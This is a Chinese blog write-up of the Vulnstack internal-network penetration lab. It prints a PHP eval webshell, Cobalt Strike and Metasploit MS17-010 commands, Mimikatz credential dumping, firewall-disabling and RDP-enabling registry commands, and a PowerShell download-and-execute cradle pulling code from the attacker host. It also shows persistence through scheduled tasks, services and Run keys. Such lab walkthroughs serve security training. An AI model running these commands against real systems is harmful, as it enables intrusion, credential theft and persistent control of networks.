内网渗透之vulnstack靶场系列(一)

冷不防 2023-10-07 20:26 52阅读 0赞

## 一、环境搭建 ##

### 拓扑图 ###

![image-20221017101315920][]

### 用户配置 ###

Vulnstack靶场有两个默认用户, 分别是域成员`liukaifeng01`和域管理员用户`Administrator`， 其默认密码均为`hongrisec@2019`

首次登录会要求用户修改密码, 除此之外我还新添加了个`test1`用户用于登录win2003主机

所有的用户信息如下表格所示：

<table> 
 <thead> 
  <tr> 
   <th>登录主机</th> 
   <th>用户</th> 
   <th>密码</th> 
  </tr> 
 </thead> 
 <tbody> 
  <tr> 
   <td>win2008 (域控服务器)</td> 
   <td>Administrator</td> 
   <td>QWEasd123</td> 
  </tr> 
  <tr> 
   <td>win7-1 (web服务器)</td> 
   <td>liukaifeng01</td> 
   <td>qQ123456</td> 
  </tr> 
  <tr> 
   <td>win2003 (域内主机)</td> 
   <td>test1</td> 
   <td>qQ123456</td> 
  </tr> 
 </tbody> 
</table>

### 虚拟主机配置信息 ###

<table> 
 <thead> 
  <tr> 
   <th>虚拟机</th> 
   <th>网卡信息</th> 
   <th>ip</th> 
  </tr> 
 </thead> 
 <tbody> 
  <tr> 
   <td>Kali linux (用于搭建CS服务器和MSF服务器)</td> 
   <td>NAT</td> 
   <td>192.168.47.134</td> 
  </tr> 
  <tr> 
   <td>win7 (攻击机)</td> 
   <td>NAT</td> 
   <td>192.168.47.133</td> 
  </tr> 
  <tr> 
   <td>win7-1 (web服务器)</td> 
   <td>NAT<br>VMnet3</td> 
   <td>192.168.47.148<br><br>192.168.52.143</td> 
  </tr> 
  <tr> 
   <td>win2008 (域控服务器)</td> 
   <td>VMnet3</td> 
   <td>192.168.52.138</td> 
  </tr> 
  <tr> 
   <td>win2003 (域内主机)</td> 
   <td>VMnet3</td> 
   <td>192.168.52.141</td> 
  </tr> 
 </tbody> 
</table>

下图为`VMnet3`网卡的配置信息, 配置的子网IP为`192.168.52.0`, 设置为仅主机模式

![1][]

下图为NAT模式的`VMnet8`网卡配置信息, 配置的子网IP为`192.168.47.0`

![2][]

### 网络连接配置 ###

域控的网络连接配置如下：

![image-20221013083305857][]

Web服务器有两个网卡, 其中一个网卡是用于Web服务器与域内主机进行数据交互, 此网卡需将DNS服务器地址设置成域控服务器地址, 其他域内成员的网络配置亦是如此, 这里就不详细描述了

![3][]

### 配置web网站 ###

在web服务器(win7)找到`phpstudy\www`目录, `yxcms`就是搭建在外网的网站源码

![image-20221013084602683][]

找到phpstudy的站点域名设置, 将网站目录设置成yxcms目录的绝对路径, 网站端口设置成`81`, 网站域名可随意设置, 这里我设置成`www.henry404.net`, 然后点击修改, 再点击保存设置并生成文件

![image-20221013085753160][]

修改Web服务器的`hosts`文件, 将本机的ip绑定如上设置好的域名

> 为什么要给192.168.52.143绑定域名? —— 为了让攻击机能够解析域名
> 
> 修改hosts文件时可能要管理员权限, 需要先给当前用户赋予修改host文件的权限,此处不详细描述

![image-20221013085924303][]

攻击机的hosts文件也要修改成与上述一致

![3][3 1]

web服务器启动phpstudy, 然后在攻击机使用浏览器访问`www.henry404.net:81`, 若出现如下图所示的页面则代表网站配置成功

![2][2 1]

## 二、渗透web服务器 ##

### 1.拿下网页后台 ###

访问配置好的网站,在其公告信息已经说明了网站的后台目录(`/index.php?r=admin`)以及管理员的账号密码(`admin,123456`)

![img][]

访问网站后台页面(`www.henry404.net:81/index.php?r=admin`), 输入账号密码登录后台

![动画][ae0ae0fe7633d3b8824810cfc04f3f56.gif]

### 2.写入webshell ###

点击前台模板->管理模板文件, 随后会显示前台的php模板文件

![image-20221013145639509][]

![image-20221013145820329][]

点击右上角的新建按钮, 新建一个前台模板文件并写入webshell(`<?php @eval($_POST['cmd']);?>`), 随后点击创建

![image-20221013225441793][]

### 3.连接webshell ###

此处不详细讲述如何寻找webshell文件的网页路径, 毕竟此靶场是以内网渗透为主

webshell的网页路径为:`http://www.henry404.net:81/protected/apps/default/view/default/test.php`, 使用蚁剑连接webshell, 即可对网站进行接下来的渗透

![image-20221013225929741][]

![image-20221013230032214][]

### 4.远程命令执行CS上线 ###

此处不演示CS服务的搭建过程, 如果想了解Cobalt Strike的相关操作可以翻阅我博客发布的CS系列文章

先使用CS客户端生成一个可执行程序木马, 然后通过蚁剑将其上传至网站服务器上, 这里选择上传至`phpstudy/WWW`目录

> 上传至C盘目录可能会因为权限问题导致上传失败

![1][1 1]

![image-20221015200538626][]

在木马所在目录打开终端, 输入`artifact.exe`运行上传的木马程序

![image-20221015200723517][]

![image-20221015200857608][]

返回CS客户端查看Web服务器上线情况

![image-20221015200955417][]

## 三、内网渗透 ##

### 信息收集 ###

#### 收集域内信息 ####

**1.查看网关的ip地址, DNS的ip地址、域名等等: `shell ipconfig /all`**

*  主机名: win7-1
 *  主域: god.org
 *  网卡1的ip: 192.168.47.149; 网卡2的ip: 192.168.47.143
 *  DNS服务器: 192.168.52.138

![image-20221015202051598][]

**2.列出当前域控的主机列表: `net view`**

*  OWA(192.168.52.138)
 *  ROOT-TVI862UBEH(192.168.52.141)
 *  WIN7-1(192.168.52.143)

![image-20221015204235545][]

**3.列出当前域的域控: `net dclist`**

当前的域控是OWA(192.168.52.138)

![image-20221015204124124][]

**4.查看当前主机的共享列表: `net share \\[主机名]`**

可以发现当前主机默认开启了C盘共享功能

![image-20221015204700456][]

#### 收集用户信息 ####

**1.查看当前主机的用户列表: `shell net user`**

![image-20221015213502712][]

**2.查看当前主机的登录用户: `shell echo %username%`**

![image-20221015213635569][]

**3.判断当前用户是否属于管理员组: `shell whoami/groups`**

这里并没有发现liukaifeng01的所在组别, builtin是内建用户

> 内建用户: 系统刚安装完成时所创建的用户, 并非当前登录用户

![image-20221015211229109][]

**4.查询本地管理员组的用户: `shell net localgroup administrators`**

可发现liukaifeng01属于本地管理员组

![image-20221015215210073][]

**5.查看当前域内所有用户: `shell net user /domain`**

![image-20221015213222577][]

#### 尝试获取用户账号密码 ####

由于当前用户liukaifeng01属于管理员组, 可以对其使用ms14-058提权模块, 提权后会返回一个SYSTEM权限的用户

![1][1 2]

对拥有SYSTEM权限的会话运行Mimikatz, 随后在beacon命令行会返回用户的账号信息

![image-20221015223405630][]

![image-20221015223553224][]

当然在`视图->凭证信息`查看用户数据会更加清晰明了

*  域管理员账号密码: Administrator/QWEasd123
 *  当前用户账号密码: liukaifeng01/qQ123456

![image-20221015223706351][]

### 横向移动 ###

#### 漏洞扫描 ####

上传`ladon`工具至Web服务器上的C盘上

![image-20221015230023173][]

随后在beacon命令行输入:`shell ladon.exe 192.168.52.0/24 MS17010`, 扫描Web服务器所处C段的IP是否存在MS17010漏洞

![image-20221015230735012][]

发现有三台主机存在MS17010漏洞, 且其中一台主机(192.168.52.138)是域控服务器

#### 漏洞利用 ####

为了将kali的MSF杀进内网, 我们要在Web服务器开启socks4代理, 走1080端口, beacon命令行输入: `socks 1080`

![image-20221016153634445][]

> Socks 代理相应的采用 Socks 协议, 代理服务器就是 Socks 服务器，这是一种通用的代理服务器。代理服务器是指位于使用者和服务器之间的计算机。通过拦截发送方和接收方之间的连接来工作。重要的是可以隐藏用户实际IP地址保护用户信息安全

在MSF设置socks4代理服务器以及开通双向隧道

msf > setg proxies socks4:192.168.47.134:1080  #配置msf的socks代理服务器
    msf > setg ReverseAllowProxy true #开启双向隧道

![image-20221016160721957][]

使用`auxiliary/admin/smb/ms17_010_command`针对MS17010漏洞执行远程命令进行关闭防火墙

> 关闭防火墙的Dos命令: `netsh advfirewall set allprofiles state off`
> 
> 查看防火墙状态的Dos命令: `netsh advfirewall show allprofiles`

msf5 > use auxiliary/admin/smb/ms17_010_command  #使用ms17010远程命令执行模块
    
    msf5 auxiliary(admin/smb/ms17_010_command) > set rhosts 192.168.52.138  #设置目标主机ip
    
    msf5 auxiliary(admin/smb/ms17_010_command) > set command netsh advfirewall set allprofiles state off #设置远程执行的命令(此处命令是关闭防火墙)
    
    msf5 auxiliary(admin/smb/ms17_010_command) > run #开启攻击

![1][1 3]

执行远程命令开启3389端口(远程服务), 发现远程服务开启失败

msf5 auxiliary(admin/smb/ms17_010_command) > set command REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
    
    msf5 auxiliary(admin/smb/ms17_010_command) > run

> 开启远程服务的Dos命令: `REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f`
> 
> 查询3389端口是否打开的Dos命令: `netstat -an | find "3389"`

![image-20221017112643655][]

接下来攻击域内成员win2003主机, 这次使用`exploit/windows/smb/ms17_010_psexec`模块, 返回目标主机的meterpreter会话(MSF上线)

set rhost 192.168.52.141  #设置目标主机
    
    set payload windows/meterpreter/bind_tcp  #设置监听协议
    
    set lhost 192.168.47.134  #设置MSF的服务器IP
    
    set lport 7777 #设置监听端口
    
    run

![image-20221017234351309][]

#### 生成跳板木马 ####

由于CS服务器无法与域控服务器进行数据交互, 只能与web服务器进行数据交互, 因此要将web服务器作为跳板来实现CS服务器与域控服务器之间的数据交互

创建跳板监听: `鼠标右键单击用户->中转->listener`

> 监听的IP应为跳板主机的内网ip(能够与域控进行通讯)

![image-20221016210053584][]

![image-20221016210246839][]

在生成后门处选择`Windows Executable(S)`, 即生成**无状态木马**, 然后上传至Web服务器的C盘目录

> Windows 带有生成出的是stageless版本(无状态Windows后门木马)，下面简单说下这个无状态木马的使用方法。一般使用无状态木马的网络环境是这样的
> 
> ![img][img 1]
> 
> 如果开启了防火墙可能会产生安全警告，最好提前用cmd关闭防火墙或者新建放行规则，然后便可以将无状态木马放入到其他内网机器中执行

![image-20221016210429801][]

![image-20221016211032234][]

#### 域内文件传输 ####

通过创建C盘共享将生成的无状态木马传送至域控服务器

与目标IP实现C盘共享: `shell net use \\192.168.52.138\c$ "QWEasd123" /user:"Administrator"`

![image-20221016211707102][]

将Web服务器C盘的无状态木马拷贝至域控服务器C盘处: `shell copy c:\\beacon.exe \\192.168.52.138\c$`

![image-20221016211855921][]

查看域控的C盘目录: `shell dir \\192.168.52.138\c$`, 判断木马是否拷贝成功

![image-20221017091802106][]

返回MSF界面, 利用ms17010漏洞远程命令执行C盘的无状态木马: `set command c:\\beacon.exe`

![image-20221016221341279][]

随后在cs客户端查看域控服务器的上线情况

![image-20221016221652207][]

### 权限维持 ###

#### 创建计划任务 ####

使用`schtasks`命令远程创建计划任务执行后门程序, 前提要知道远程主机的管理员账号密码

schtasks /create /s 192.168.52.138 /u Administrator /p QWEasd123 /ru "SYSTEM" /tn test /sc DAILY /st 20:45 /tr C:\\beacon.exe /F

> /ru: 运行该任务的用户, 对于系统帐户，有效值是 “”、“NT AUTHORITY\\SYSTEM” 或"SYSTEM"
> 
> /tn: 任务名称
> 
> /sc: 任务执行频率, 其中daily表示每天执行
> 
> /tr: 要执行的文件
> 
> /F: 强制执行任务

查看域控服务器的任务计划程序, 可发现刚创建的后门计划任务

![1][1 4]

若要清除计划任务执行以下命令

schtasks /delete /s 192.168.52.138 /tn "test" /f

#### 创建windows服务 ####

使用sc命令创建一个名为"name"的服务, 设置开机后门脚本程序自启动, 注意将powershell命令行替换成自己的

shell sc create "name" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.47.134:80/a'))\""

设置name服务自启动

shell SC config "name" start= auto

设置服务的描述内容

shell SC description "name" "description"

启动服务

shell net start "name"

删除服务

shell SC delete "name

#### 创建注册表后门 ####

将`/d`后的文件路径修改成后门程序的路径

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Keyname" /t REG_SZ /d "C:\\beacon.exe" /f

## 总结 ##

### 1.`ms17_010_psexec`模块的利用条件 ###

*  防火墙必须允许SMB流量出入
 *  目标必须使用SMBv1协议
 *  目标必须缺少MS17-010补丁
 *  目标必须允许匿名IPC $和管道名

### 2.使用`ms17_010_psexec`模块有几率导致蓝屏 ###

### 3.开启远程服务和关闭防火墙需要管理员权限 ###

[image-20221017101315920]: https://img-blog.csdnimg.cn/img_convert/b7ff7797ee1907c93fe1e0bcc71d69ce.png
[1]: https://img-blog.csdnimg.cn/img_convert/c9be68d3daf4b31ab69badb66dcfdc51.png
[2]: https://img-blog.csdnimg.cn/img_convert/cda6180389bad28c83a4c0dd58898dde.png
[image-20221013083305857]: https://img-blog.csdnimg.cn/img_convert/7558bfc92bbdd40fe4f098dbdf9a91ad.png
[3]: https://img-blog.csdnimg.cn/img_convert/f6f074d8e6c4cfd20d2e7b76ab604d16.png
[image-20221013084602683]: https://img-blog.csdnimg.cn/img_convert/cd44c0b6211547dd385759243c726414.png
[image-20221013085753160]: https://img-blog.csdnimg.cn/img_convert/a2797fd3db6342760047aba017de0000.png
[image-20221013085924303]: https://img-blog.csdnimg.cn/img_convert/4f25a52c5be8614f1b39920239c8f9df.png
[3 1]: https://img-blog.csdnimg.cn/img_convert/caaeeb9fc39dd64f3175ae4bf8973f91.png
[2 1]: https://img-blog.csdnimg.cn/img_convert/162d2e721abad84287d9801d68c2fd9e.png
[img]: https://img-blog.csdnimg.cn/img_convert/2a917c0aa5d138eca6aa30ac02eef41c.png
[ae0ae0fe7633d3b8824810cfc04f3f56.gif]: https://img-blog.csdnimg.cn/img_convert/ae0ae0fe7633d3b8824810cfc04f3f56.gif
[image-20221013145639509]: https://img-blog.csdnimg.cn/img_convert/7ff64242e374f4a05436ab2f473bdb96.png
[image-20221013145820329]: https://img-blog.csdnimg.cn/img_convert/a5e6d86ea89d146f77e3d1fd7126d629.png
[image-20221013225441793]: https://img-blog.csdnimg.cn/img_convert/70d51a31ef42f066b6ce18e25bdda525.png
[image-20221013225929741]: https://img-blog.csdnimg.cn/img_convert/9f66cb9b011ebb639c8ed0de4689c993.png
[image-20221013230032214]: https://img-blog.csdnimg.cn/img_convert/b50f54636fe6cdf34ab69eb3c233562a.png
[1 1]: https://img-blog.csdnimg.cn/img_convert/5d73e12670284cfe1d79f5196b7e669e.png
[image-20221015200538626]: https://img-blog.csdnimg.cn/img_convert/45658c44449e4e90463b6592a79ab57b.png
[image-20221015200723517]: https://img-blog.csdnimg.cn/img_convert/f4459257fb031e79c79e663affe2e76c.png
[image-20221015200857608]: https://img-blog.csdnimg.cn/img_convert/da29fd5bb9387792b020190ccceaab23.png
[image-20221015200955417]: https://img-blog.csdnimg.cn/img_convert/dc0b4a165be45563cc1da1293d9b498a.png
[image-20221015202051598]: https://img-blog.csdnimg.cn/img_convert/c946ac8586d8916febff97e218d44fab.png
[image-20221015204235545]: https://img-blog.csdnimg.cn/img_convert/f875b3df917541513eddfdd0c6091ca7.png
[image-20221015204124124]: https://img-blog.csdnimg.cn/img_convert/7e34de5d41e59603e07dd58c1dd0ecfd.png
[image-20221015204700456]: https://img-blog.csdnimg.cn/img_convert/c859164c408094defcf06415136a57f3.png
[image-20221015213502712]: https://img-blog.csdnimg.cn/img_convert/847f515b7cc85e222165b8fcab28fc46.png
[image-20221015213635569]: https://img-blog.csdnimg.cn/img_convert/babaf9945d02e8cd04cf0f974393b3ce.png
[image-20221015211229109]: https://img-blog.csdnimg.cn/img_convert/bb274767628bf18a247cca1b579a316a.png
[image-20221015215210073]: https://img-blog.csdnimg.cn/img_convert/13ea187d4743ae2497d66182387ac4ee.png
[image-20221015213222577]: https://img-blog.csdnimg.cn/img_convert/4dbcc2018003158e8aee577dec712028.png
[1 2]: https://img-blog.csdnimg.cn/img_convert/2323ab1a845cd8779b163c3f19f8389a.png
[image-20221015223405630]: https://img-blog.csdnimg.cn/img_convert/732e237c592fc2ff855397bc20a68e6c.png
[image-20221015223553224]: https://img-blog.csdnimg.cn/img_convert/decf460b1704189f309cb2ad753b2daa.png
[image-20221015223706351]: https://img-blog.csdnimg.cn/img_convert/b0d61a8a17c677dafabada2df6473c62.png
[image-20221015230023173]: https://img-blog.csdnimg.cn/img_convert/c455260f657dcf9fd726ef9b5e5913da.png
[image-20221015230735012]: https://img-blog.csdnimg.cn/img_convert/eb348c1476c3e66c9cf49f06f4f0b75d.png
[image-20221016153634445]: https://img-blog.csdnimg.cn/img_convert/65b1e9036d363daaffdf3ad31e2288bd.png
[image-20221016160721957]: https://img-blog.csdnimg.cn/img_convert/528cc88f13ae0740c06a8582ccee9968.png
[1 3]: https://img-blog.csdnimg.cn/img_convert/97fa04ad02e568fb4f8ac61353b7e431.png
[image-20221017112643655]: https://img-blog.csdnimg.cn/img_convert/74325726b718e4194246b8fbe206bead.png
[image-20221017234351309]: https://img-blog.csdnimg.cn/img_convert/112035b04336ee9e7cc2fb6be2910df0.png
[image-20221016210053584]: https://img-blog.csdnimg.cn/img_convert/f9b7f0d1efe5ccc1e433364ebd3ff398.png
[image-20221016210246839]: https://img-blog.csdnimg.cn/img_convert/f762d1d3e418703d1bee94b9c2fc16a7.png
[img 1]: https://img-blog.csdnimg.cn/img_convert/e9cf843e0c5b93eb958317d7ecf0d3fd.jpeg
[image-20221016210429801]: https://img-blog.csdnimg.cn/img_convert/c57a3960ea65dbefa07001b78eb3a364.png
[image-20221016211032234]: https://img-blog.csdnimg.cn/img_convert/5fb15c6cfd16efdb523178b3b18d39fc.png
[image-20221016211707102]: https://img-blog.csdnimg.cn/img_convert/ec3619f8f7aa1c6c7cbaf3774182b3a7.png
[image-20221016211855921]: https://img-blog.csdnimg.cn/img_convert/d0dc8691a6420e2fe2b184b5acd71f72.png
[image-20221017091802106]: https://img-blog.csdnimg.cn/img_convert/1e48cdac3bed102ab16943d1d0beb210.png
[image-20221016221341279]: https://img-blog.csdnimg.cn/img_convert/73c840604cd041d57114e12b38c2f2e2.png
[image-20221016221652207]: https://img-blog.csdnimg.cn/img_convert/7b7c011add13805896bee2d2d033077d.png
[1 4]: https://img-blog.csdnimg.cn/img_convert/a99ab11e3db550ef4ddd1b72638e35f7.png